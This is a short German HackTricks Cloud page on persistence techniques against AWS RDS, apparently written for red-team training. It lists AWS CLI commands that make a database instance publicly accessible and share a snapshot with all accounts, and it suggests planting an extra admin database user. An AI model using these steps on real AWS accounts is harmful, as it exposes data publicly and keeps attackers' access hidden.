AWS - RDS Persistenz
Tip
Lerne & übe AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Unterstütze HackTricks
- Sieh dir die Abonnementpläne an!
- Tritt der 💬 Discord group oder der telegram group bei oder folge uns auf Twitter 🐦 @hacktricks_live.
- Teile Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud GitHub-Repos einreichst.
RDS
Für weitere Informationen siehe:
AWS - Relational Database (RDS) Enum
Instanz öffentlich zugänglich machen: rds:ModifyDBInstance
Ein Angreifer mit dieser Berechtigung kann eine bestehende RDS-Instanz ändern, um öffentliche Zugänglichkeit zu ermöglichen.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Einen Admin-Benutzer in der DB erstellen
Ein Angreifer könnte einfach einen Benutzer in der DB erstellen, sodass er, selbst wenn das Passwort des Master-Users geändert wird, den Zugriff auf die Datenbank nicht verliert.
Snapshot öffentlich machen
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
Lerne & übe AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Unterstütze HackTricks
- Sieh dir die Abonnementpläne an!
- Tritt der 💬 Discord group oder der telegram group bei oder folge uns auf Twitter 🐦 @hacktricks_live.
- Teile Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud GitHub-Repos einreichst.
HackTricks Cloud

